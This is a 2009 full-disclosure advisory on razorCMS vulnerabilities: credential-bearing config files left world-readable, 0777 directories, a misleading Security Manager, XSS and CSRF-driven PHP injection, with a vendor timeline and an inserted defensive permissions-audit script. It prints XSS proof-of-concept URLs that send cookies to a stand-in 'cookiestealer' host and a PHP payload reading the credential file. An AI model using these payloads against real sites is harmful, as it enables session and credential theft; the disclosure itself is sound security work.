Message-Id: <20090416091324.417D3118040@smtp.hushmail.com>
Date: Thu, 16 Apr 2009 02:13:23 -0700
From: "Jeremi Gosney" <epixoip@...h.com>
To: full-disclosure@...ts.grok.org.uk
Subject: razorCMS - Multiple Vulnerabilities
Multiple Vulnerability Disclosure for razorCMS
----------------------------------------------
A recent security audit has uncovered multiple security
vulnerabilities in the latest version (0.3RC2) and all previous
versions of razorCMS CORE by Morgan Integrated Systems. From the
vendor site: "razorCMS is an open source content management system
written in PHP, using a flat file database structure instead of
having a separate database. It has been released under the GNU
General Public License." http://razorcms.co.uk,
http://en.wikipedia.org/wiki/RazorCMS
* The razorCMS install script sets mode 0644 on
admin/core/admin_config.php, which contains the site owner's
cleartext FTP credentials and a sha1sum hash of the site admin
password. Any local user has access to these credentials, and the
admin password can easily be cracked offline (rainbow tables, brute
force, etc). The vendor is planning for the use of stronger file
permissions, two-way encryption for FTP credentials, and stronger
salted hashes for admin passwords in the next release (version 0.4).
* razorCMS requires a laundry list of files to be mode 0777 for
installation, and promises to correct these permissions after
installation. The razorCMS install script leaves the following
directories in mode 0777 after installation: the razorCMS root
directory, the datastore/ directory, and the admin/core/ directory.
The issue with this should be readily apparent to you. The vendor
is considering fixing the installer in the next release.
* The razorCMS Security Manager is "used to ensure apache owned
files have safe permissions set." In theory, if the Security
Manager detects any insecure files, it will display a warning
message and instruct the user to click a button to "secure" the
site. By the same token, if all files are found to be secure, the
Security Manager will display "All files are currently safe." The
problem is the Security Manager doesn't actually *do* anything --
it only checks the file permissions of a handful of files, and not
even all of the Apache-owned files like it states. If a user were
to recursively chmod the razorCMS installation to 0777 (which may
be tempting for a novice user to do due to the large number of
files the installer requires to be mode 0777) and then rely on the
Security Manager to secure the site, nearly all files and
directories would be left in mode 0777 and the Security Manager
would report "All files are currently safe." The vendor does not
feel that this tool is broken, just that the phrase "All files" is
misleading and the wording should be changed. I have been
unsuccessful in convincing the vendor that the Security Manager
should *actually* secure the site, so don't expect this to be
fixed. Ever.
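An added example, not part of the advisory and not razorCMS code: a shell audit that does what the advisory says the Security Manager should, checking every entry under the install root rather than a handful of files, with the matching remediation. It assumes the layout named above (datastore/ and admin/core/admin_config.php) and that the web server user owns the config file.

```shell
#!/bin/sh
# Added example (not razorCMS code): recursive permission audit and fix for a
# razorCMS install. Assumes the paths named in the advisory.

# Print every world-writable file or directory under the install root and
# flag admin_config.php if group or other can read it. Returns 1 when
# anything is found, 0 when the tree is clean.
audit_razor_perms() {
    root="$1"
    cfg="$root/admin/core/admin_config.php"
    bad=0
    # -perm -0002 matches any entry with the other-write bit set; a claim of
    # "All files are currently safe" should rest on this walk, not on a list.
    ww=$(find "$root" -perm -0002 -print)
    if [ -n "$ww" ]; then
        printf 'world-writable:\n%s\n' "$ww"
        bad=1
    fi
    # The installer leaves the config at 0644; the cleartext FTP credentials
    # and admin hash must not be readable by other local users.
    if [ -f "$cfg" ] && [ -n "$(find "$cfg" \( -perm -0004 -o -perm -0040 \) -print)" ]; then
        printf 'readable by group/other: %s\n' "$cfg"
        bad=1
    fi
    return "$bad"
}

# Remediation: strip the other-write bit everywhere and restrict the config
# to its owner (assumes the web server user owns admin_config.php so it can
# still read it afterwards).
secure_razor_perms() {
    root="$1"
    find "$root" -perm -0002 -exec chmod o-w {} +
    if [ -f "$root/admin/core/admin_config.php" ]; then
        chmod 0600 "$root/admin/core/admin_config.php"
    fi
    return 0
}
```

Run `audit_razor_perms /path/to/razorcms` from cron or after every install to catch the 0777 leftovers the installer promises to clean up.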
* Several cross-site scripting vulnerabilities have been
discovered in the razorCMS admin section, and will be fixed for the
next release:
http://yoursite.com/cms/admin/?action=edit&slab=home'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form
http://yoursite.com/cms/admin/?action=showcats&unpub=true&slabID=1&catname=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form
http://yoursite.com/cms/admin/?action=reordercat&cat=sidebar'><script>alert('http://yourcookiestealer.org/evil.php?cookie='%20+%20encodeURI(document.cookie)%20+%20'&useragent='%20+%20encodeURI(navigator.userAgent));</script><form&param=0,1
* razorCMS has the ability to save content as .php files
(behaviour enabled by default, may be changed in the 'Settings'
area to html). This allows arbitrary PHP code to be injected into
any page, enabling the owner to run commands on the server with the
privileges of the web server. This may also be exploited remotely
through a cross-site request forgery attack: for example, in an
effort to steal user credentials, an authenticated admin may be
tricked into submitting a malicious form that creates a page on
their site containing something like <?php system("cat
../../admin/core/admin_config.php"); ?>. The vendor has no plans to
change this behaviour.
Timeline:
04.06.2009 - Initial vendor notification.
04.07.2009 - Vendor disputes vulnerabilities.
04.07.2009 - Vulnerabilities explained.
04.07.2009 - Vendor begins to implement certain fixes, refuses to
fix others.
04.07.2009 - Vulnerabilities explained again.
04.07.2009 - Vendor continues to dispute some vulnerabilities.
04.15.2009 - Vendor notified for last time.
04.16.2009 - Public Disclosure.